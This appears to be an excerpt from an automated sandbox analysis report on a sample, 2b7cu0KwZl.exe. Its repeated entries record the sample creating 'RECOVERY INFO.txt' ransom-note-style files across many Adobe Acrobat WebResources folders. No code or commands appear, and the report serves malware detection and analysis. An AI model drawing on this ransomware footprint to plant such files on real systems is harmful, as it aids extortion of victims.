Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\files\dev\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ar-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themeless_Reader\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\ccpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\epdf\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\images\themeless\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
